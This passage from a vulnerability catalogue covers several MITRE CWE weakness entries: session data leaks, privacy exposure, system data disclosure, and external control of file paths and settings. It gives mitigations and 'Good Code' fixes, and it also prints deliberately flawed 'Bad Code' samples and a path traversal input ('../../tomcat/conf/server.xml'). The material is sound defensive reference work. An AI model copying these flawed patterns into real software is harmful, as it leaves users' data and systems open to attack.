Scope | Effect
Confidentiality

Technical Impact: Read application data

+ Demonstrative Examples

Example 1

The following Servlet stores the value of a request parameter in a member field and then later echoes the parameter value to the response output stream.

(Bad Code)
Example Language: Java 
public class GuestBook extends HttpServlet {
    String name;

    protected void doPost (HttpServletRequest req, HttpServletResponse res) {
        name = req.getParameter("name");
        ...
        out.println(name + ", thanks for visiting!");
    }
}

While this code will work perfectly in a single-user environment, if two users access the Servlet at approximately the same time, it is possible for the two request handler threads to interleave in the following way, thereby showing the first user the second user's name:

  • Thread 1: assign "Dick" to name
  • Thread 2: assign "Jane" to name
  • Thread 1: print "Jane, thanks for visiting!"
  • Thread 2: print "Jane, thanks for visiting!"
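
A common fix, sketched below, keeps the request data in a local variable so that each request-handling thread works on its own copy; obtaining the PrintWriter from the response is shown explicitly here for completeness.

(Good Code)
Example Language: Java 
public class GuestBook extends HttpServlet {

    protected void doPost(HttpServletRequest req, HttpServletResponse res) throws IOException {
        // A local variable gives each request thread its own copy, so data cannot bleed between sessions.
        String name = req.getParameter("name");
        PrintWriter out = res.getWriter();
        out.println(name + ", thanks for visiting!");
    }
}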

+ Potential Mitigations

Phase: Architecture and Design

Protect the application's sessions from information leakage. Make sure that a session's data is not used or visible by other sessions.

Phase: Testing

Use a static analysis tool to scan the code for information leakage vulnerabilities (e.g. Singleton Member Field).

Phase: Architecture and Design

In a multithreading environment, storing user data in Servlet member fields introduces a data access race condition. Do not use member fields to store information in the Servlet.

+ Relationships
Nature | Type | ID | Name | View(s)
ChildOf | Weakness Class | 485 | Insufficient Encapsulation | Development Concepts (primary) 699; Seven Pernicious Kingdoms (primary) 700; Research Concepts (primary) 1000
ChildOf | Category | 882 | CERT C++ Secure Coding Section 14 - Concurrency (CON) | Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary) 868
ChildOf | Category | 965 | SFP Secondary Cluster: Insecure Session Management | Software Fault Pattern (SFP) Clusters (primary) 888
CanFollow | Weakness Base | 567 | Unsynchronized Access to Shared Data in a Multithreaded Context | Research Concepts 1000
+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
7 Pernicious Kingdoms |  |  | Data Leaking Between Users
CERT C++ Secure Coding | CON02-CPP |  | Use lock classes for mutex management
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Description, Relationships, Other_Notes, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Relationships
2011-03-29CWE Content TeamMITREInternal
updated Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Data Leaking Between Users
2011-03-29Data Leak Between Sessions

CWE-359: Exposure of Private Information ('Privacy Violation')

Weakness ID: 359
Abstraction: Class
Status: Incomplete
+ Description

Description Summary

The software does not properly prevent private data (such as credit card numbers) from being accessed by actors who either (1) are not explicitly authorized to access the data or (2) do not have the implicit consent of the people to which the data is related.

Extended Description

Mishandling private information, such as customer passwords or Social Security numbers, can compromise user privacy and is often illegal. An exposure of private information does not necessarily prevent the software from working properly, and in fact it might be intended by the developer, but it can still be undesirable (or explicitly prohibited by law) for the people who are associated with this private information.

Privacy violations may occur when:

  1. Private user information enters the program.

  2. The data is written to an external location, such as the console, file system, or network.

Private data can enter a program in a variety of ways:

  1. Directly from the user in the form of a password or personal information

  2. Accessed from a database or other data store by the application

  3. Indirectly from a partner or other third party

Some types of private information include:

  • Government identifiers, such as Social Security Numbers

  • Contact information, such as home addresses and telephone numbers

  • Geographic location - where the user is (or was)

  • Employment history

  • Financial data - such as credit card numbers, salary, bank accounts, and debts

  • Pictures, video, or audio

  • Behavioral patterns - such as web surfing history, when certain activities are performed, etc.

  • Relationships (and types of relationships) with others - family, friends, contacts, etc.

  • Communications - e-mail addresses, private e-mail messages, SMS text messages, chat logs, etc.

  • Health - medical conditions, insurance status, prescription records

  • Credentials, such as passwords, which can be used to access other information.

Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry.

Depending on its location, the type of business it conducts, and the nature of any private data it handles, an organization may be required to comply with one or more of the following federal and state regulations:

  • Safe Harbor Privacy Framework [R.359.2]

  • Gramm-Leach Bliley Act (GLBA) [R.359.3]

  • Health Insurance Portability and Accountability Act (HIPAA) [R.359.4]

  • California SB-1386 [R.359.5]

Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student's personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private.

Security and privacy concerns often seem to compete with each other. From a security perspective, all important operations should be recorded so that any anomalous activity can later be identified. However, when private data is involved, this practice can in fact create risk. Although there are many ways in which private data can be handled unsafely, a common risk stems from misplaced trust. Programmers often trust the operating environment in which a program runs, and therefore believe that it is acceptable to store private information on the file system, in the registry, or in other locally-controlled resources. However, even if access to certain resources is restricted, this does not guarantee that the individuals who do have access can be trusted.

+ Alternate Terms
Privacy leak
Privacy leakage
+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Mobile Application

+ Common Consequences
Scope | Effect
Confidentiality

Technical Impact: Read application data

+ Demonstrative Examples

Example 1

In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [R.359.1]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated.

Example 2

The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the GetPassword() function returns the user-supplied plaintext password associated with the account.

(Bad Code)
Example Language: C# 
pass = GetPassword();
...
dbmsLog.WriteLine(id + ":" + pass + ":" + type + ":" + tstamp);

The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern.
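
A safer logging call, sketched below in Java with names mirroring the example above (the dbmsLog writer and the record fields are illustrative), masks the password so the sensitive value is never written to the log.

(Good Code)
Example Language: Java 
// Illustrative sketch: the record fields mirror the example above, and the writer is supplied by the caller.
public static void logRecord(java.io.PrintWriter dbmsLog, String id, String type, long tstamp) {
    // The password is deliberately omitted; only non-sensitive fields reach the log.
    dbmsLog.println(id + ":********:" + type + ":" + tstamp);
}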

Example 3

This code uses location to determine the user's current US State location.

First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml:

(Bad Code)
Example Language: XML 
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>

During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible:

(Bad Code)
Example Language: Java 
locationClient = new LocationClient(this, this, this);
locationClient.connect();
Location userCurrLocation;
userCurrLocation = locationClient.getLastLocation();
deriveStateFromCoords(userCurrLocation);

While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in.

+ Relationships
Nature | Type | ID | Name | View(s)
ChildOf | Weakness Class | 200 | Information Exposure | Research Concepts (primary) 1000
ChildOf | Category | 254 | Security Features | Development Concepts (primary) 699; Seven Pernicious Kingdoms (primary) 700
ChildOf | Category | 857 | CERT Java Secure Coding Section 12 - Input Output (FIO) | Weaknesses Addressed by the CERT Java Secure Coding Standard (primary) 844
ChildOf | Category | 975 | SFP Secondary Cluster: Architecture | Software Fault Pattern (SFP) Clusters (primary) 888
ParentOf | Weakness Variant | 202 | Exposure of Sensitive Data Through Data Queries | Research Concepts (primary) 1000
+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
7 Pernicious Kingdoms |  |  | Privacy Violation
CERT Java Secure Coding | FIO13-J |  | Do not log sensitive information outside a trust boundary
+ References
[R.359.1] J. Oates. "AOL man pleads guilty to selling 92m email addies". The Register. 2005. <http://www.theregister.co.uk/2005/02/07/aol_email_theft/>.
NIST. "Guide to Protecting the Confidentiality of Personally Identifiable Information (SP 800-122)". April 2010. <http://csrc.nist.gov/publications/nistpubs/800-122/sp800-122.pdf>.
[R.359.2] [REF-2] U.S. Department of Commerce. "Safe Harbor Privacy Framework". <http://www.export.gov/safeharbor/>.
[R.359.3] [REF-3] Federal Trade Commission. "Financial Privacy: The Gramm-Leach Bliley Act (GLBA)". <http://www.ftc.gov/privacy/glbact/index.html>.
[R.359.4] [REF-4] U.S. Department of Human Services. "Health Insurance Portability and Accountability Act (HIPAA)". <http://www.hhs.gov/ocr/hipaa/>.
[R.359.5] [REF-5] Government of the State of California. "California SB-1386". 2002. <http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html>.
[R.359.6] [REF-1] Information Technology Laboratory, National Institute of Standards and Technology. "SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES". 2001-05-25. <http://csrc.nist.gov/publications/fips/fips140-2/fips1402.pdf>.
[REF-33] Chris Wysopal. "Mobile App Top 10 List". 2010-12-13. <http://www.veracode.com/blog/2010/12/mobile-app-top-10-list/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-03-10CWE Content TeamMITREInternal
updated Other_Notes
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-12-28CWE Content TeamMITREInternal
updated Other_Notes, References
2010-02-16CWE Content TeamMITREInternal
updated Other_Notes, References
2011-03-29CWE Content TeamMITREInternal
updated Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-09-13CWE Content TeamMITREInternal
updated Other_Notes, References
2012-05-11CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings
2013-02-21CWE Content TeamMITREInternal
updated Applicable_Platforms, References
2014-02-18CWE Content TeamMITREInternal
updated Alternate_Terms, Demonstrative_Examples, Description, Name, Other_Notes, References
2014-07-30CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2014-02-18Privacy Violation

CWE-497: Exposure of System Data to an Unauthorized Control Sphere

Weakness ID: 497
Abstraction: Variant
Status: Incomplete
+ Description

Description Summary

Exposing system data or debugging information helps an adversary learn about the system and form an attack plan.

Extended Description

An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. An attacker can also cause errors to occur by submitting unusual requests to the web application. The response to these errors can reveal detailed system information, deny service, cause security mechanisms to fail, and crash the server. An attacker can use error messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. An application may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
Scope | Effect
Confidentiality

Technical Impact: Read application data

+ Demonstrative Examples

Example 1

The following code prints the path environment variable to the standard error stream:

(Bad Code)
Example Language: C 
char* path = getenv("PATH");
...
fprintf(stderr, "cannot find exe on path %s\n", path);

Example 2

The following code prints an exception to the standard error stream:

(Bad Code)
Example Language: Java 
try {
    ...
} catch (Exception e) {
    e.printStackTrace();
}

(Bad Code)
Example Language: C# 
try {
    ...
} catch (Exception e) {
    Console.WriteLine(e);
}

Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program.

Example 3

The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console.

(Bad Code)
Example Language: C# 
string cs = "database=northwind; server=mySQLServer...";
SqlConnection conn = new SqlConnection(cs);
...
Console.WriteLine(cs);

Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In this example, the printed connection string reveals the name of the database server and the database itself, giving an attacker useful detail for targeting the back-end database directly.

+ Potential Mitigations

Phases: Architecture and Design; Implementation

Production applications should never use methods that generate internal details such as stack traces and error messages unless that information is directly committed to a log that is not viewable by the end user. All error message text should be HTML entity encoded before being written to the log file to protect against potential cross-site scripting attacks against the viewer of the logs.
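
A minimal sketch of this approach using java.util.logging (the class, logger name, and messages are illustrative): the exception detail is kept in a protected server-side log, and nothing derived from it is echoed back to the user.

(Good Code)
Example Language: Java 
import java.util.logging.Level;
import java.util.logging.Logger;

public class DiagnosticsExample {

    private static final Logger LOG = Logger.getLogger("app.diagnostics"); // illustrative logger name

    public String handle(Runnable operation) {
        try {
            operation.run();
            return "OK";
        } catch (Exception e) {
            // Implementation details stay in a log that end users cannot view.
            LOG.log(Level.SEVERE, "Operation failed", e);
            // The caller, and ultimately the user, sees only a generic message.
            return "An internal error occurred";
        }
    }
}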

+ Relationships
Nature | Type | ID | Name | View(s)
ChildOf | Weakness Class | 200 | Information Exposure | Development Concepts (primary) 699; Research Concepts (primary) 1000
ChildOf | Weakness Class | 485 | Insufficient Encapsulation | Seven Pernicious Kingdoms (primary) 700
ChildOf | Category | 851 | CERT Java Secure Coding Section 06 - Exceptional Behavior (ERR) | Weaknesses Addressed by the CERT Java Secure Coding Standard (primary) 844
ChildOf | Category | 880 | CERT C++ Secure Coding Section 12 - Exceptions and Error Handling (ERR) | Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary) 868
ChildOf | Category | 963 | SFP Secondary Cluster: Exposed Data | Software Fault Pattern (SFP) Clusters (primary) 888
+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
7 Pernicious Kingdoms |  |  | System Information Leak
CERT Java Secure Coding | ERR01-J |  | Do not allow exceptions to expose sensitive information
CERT C++ Secure Coding | ERR12-CPP |  | Do not allow exceptions to transmit sensitive information
Software Fault Patterns | SFP23 |  | Exposed Data
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Type
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2009-12-28CWE Content TeamMITREInternal
updated Description, Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11System Information Leak
2009-12-28Information Leak of System Data

CWE-73: External Control of File Name or Path

Weakness ID: 73
Abstraction: Class
Status: Draft
+ Description

Description Summary

The software allows user input to control or influence paths or file names that are used in filesystem operations.

Extended Description

This could allow an attacker to access or modify system files or other files that are critical to the application.

Path manipulation errors occur when the following two conditions are met:

1. An attacker can specify a path used in an operation on the filesystem.

2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted.

For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

All

Operating Systems

UNIX: (Often)

Windows: (Often)

Mac OS: (Often)

+ Common Consequences
ScopeEffect
Integrity
Confidentiality

Technical Impact: Read files or directories; Modify files or directories

The application can operate on unexpected files. Confidentiality is violated when the targeted file is not otherwise directly readable by the attacker.

Integrity
Confidentiality
Availability

Technical Impact: Modify files or directories; Execute unauthorized code or commands

The application can operate on unexpected files. This may violate integrity if the file is written to, or if the file is a program or other form of executable code.

Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (other)

The application can operate on unexpected files. Availability can be violated if the attacker specifies an unexpected file that the application modifies. Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives, i.e., warnings that have no security consequences and do not require any code changes.

+ Demonstrative Examples

Example 1

The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22).

(Bad Code)
Example Language: Java 
String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName);
...
rFile.delete();

Example 2

The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.

(Bad Code)
Example Language: Java 
FileInputStream fis = new FileInputStream(cfg.getProperty("sub") + ".txt");
byte[] arr = new byte[1024];
int amt = fis.read(arr);
out.println(new String(arr, 0, amt));
+ Observed Examples
ReferenceDescription
Chain: external control of values for user's desired language and theme enables path traversal.
Chain: external control of user's target language enables remote file inclusion.
+ Potential Mitigations

Phase: Architecture and Design

When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.
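
A minimal Java sketch of such a mapping, using the IDs and filenames mentioned above; the class name and report directory are illustrative assumptions, not part of this entry.

(Good Code)
Example Language: Java
import java.util.Map;

public class ReportFiles {
    // Fixed mapping from externally supplied IDs to internal filenames.
    private static final Map<String, String> REPORTS = Map.of(
        "1", "inbox.txt",
        "2", "profile.txt");

    public static String lookup(String id) {
        String name = REPORTS.get(id);
        if (name == null) {
            // Any ID outside the known set is rejected outright.
            throw new IllegalArgumentException("Unknown report ID");
        }
        return "/usr/local/apfr/reports/" + name;
    }
}

Because the externally supplied value never reaches the filesystem API directly, path traversal sequences in the input have no effect.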

Phases: Architecture and Design; Operation

Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.

Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When validating filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
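
A minimal Java sketch of the filename whitelist described above; the permitted character set and extension list are illustrative assumptions.

(Good Code)
Example Language: Java
import java.util.Set;
import java.util.regex.Pattern;

public class FileNameValidator {
    // Whitelist: letters, digits, "_" and "-", then a single "." and an extension.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]+\\.[A-Za-z0-9]+");
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("txt", "csv", "pdf");

    public static boolean isAllowed(String fileName) {
        if (fileName == null || !SAFE_NAME.matcher(fileName).matches()) {
            return false; // rejects "/", "\", "..", and names with more than one "."
        }
        String extension = fileName.substring(fileName.lastIndexOf('.') + 1).toLowerCase();
        return ALLOWED_EXTENSIONS.contains(extension);
    }
}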

Phase: Implementation

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59).
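
In Java, a comparable check can be built on canonical paths. The sketch below, which assumes a fixed base directory, canonicalizes the requested path and verifies that it remains inside that directory; the class name and directory are illustrative assumptions.

(Good Code)
Example Language: Java
import java.io.File;
import java.io.IOException;

public class PathCheck {
    // Resolve the requested name against a fixed base directory and verify containment.
    public static File resolve(String requestedName) throws IOException {
        File base = new File("/usr/local/apfr/reports").getCanonicalFile();
        File target = new File(base, requestedName).getCanonicalFile();
        if (!target.getPath().startsWith(base.getPath() + File.separator)) {
            // Canonicalization has already resolved ".." sequences and symbolic links (CWE-23, CWE-59).
            throw new IOException("Requested path escapes the report directory");
        }
        return target;
    }
}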

Phases: Installation; Operation

Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack.

Phases: Operation; Implementation

If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Phase: Testing

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Phase: Testing

Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Phase: Testing

Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class610Externally Controlled Reference to a Resource in Another Sphere
Research Concepts1000
ChildOfWeakness ClassWeakness Class642External Control of Critical State Data
Research Concepts (primary)1000
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory7522009 Top 25 - Risky Resource Management
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory981SFP Secondary Cluster: Path Traversal
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness ClassWeakness Class22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base41Improper Resolution of Path Equivalence
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base59Improper Link Resolution Before File Access ('Link Following')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base434Unrestricted Upload of File with Dangerous Type
Research Concepts1000
CanAlsoBeWeakness BaseWeakness Base99Improper Control of Resource Identifiers ('Resource Injection')
Research Concepts1000
+ Relationship Notes

The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, to load code libraries, to store application data, to store configuration settings, to record temporary data, to act as signals or semaphores to other processes, and so on.

However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all.

The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsPath Manipulation
CERT C++ Secure CodingFIO01-CPPBe careful using functions that use file names for identification
CERT C++ Secure CodingFIO02-CPPCanonicalize path names originating from untrusted sources
Software Fault PatternsSFP16Path Traversal
+ References
[REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations, Relationships
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Description
2009-12-28CWE Content TeamMITREInternal
updated Detection_Factors
2010-02-16CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Path Manipulation

CWE-15: External Control of System or Configuration Setting

Weakness ID: 15
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

One or more system settings or configuration elements can be externally controlled by a user.

Extended Description

Allowing external control of system settings can disrupt service or cause an application to behave in unexpected and potentially malicious ways.

+ Time of Introduction
  • Implementation
+ Modes of Introduction

Setting manipulation vulnerabilities occur when an attacker can control values that govern the behavior of the system, manage specific resources, or in some way affect the functionality of the application.

+ Common Consequences
ScopeEffect
Other

Technical Impact: Varies by context

+ Demonstrative Examples

Example 1

The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine.

(Bad Code)
Example Language: C
...
sethostid(argv[1]);
...

Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior.

Example 2

The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection.

(Bad Code)
Example Language: Java 
...
conn.setCatalog(request.getParameter("catalog"));
...

In this example, an attacker could cause an error by providing a nonexistent catalog name, or could connect to an unauthorized portion of the database.

+ Potential Mitigations

Phase: Architecture and Design

Strategy: Separation of Privilege

Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.

Ensure that appropriate compartmentalization is built into the system design and that the compartmentalization serves to allow for and further reinforce privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide when it is appropriate to use and to drop system privileges.

Phases: Implementation; Architecture and Design

Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control.

Phases: Implementation; Architecture and Design

In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker.
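
Applied to Example 2 above, a minimal Java sketch of this principle validates the requested catalog against a fixed set before it is allowed to influence the connection; the class name and catalog names are illustrative assumptions.

(Good Code)
Example Language: Java
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Set;

public class CatalogSelector {
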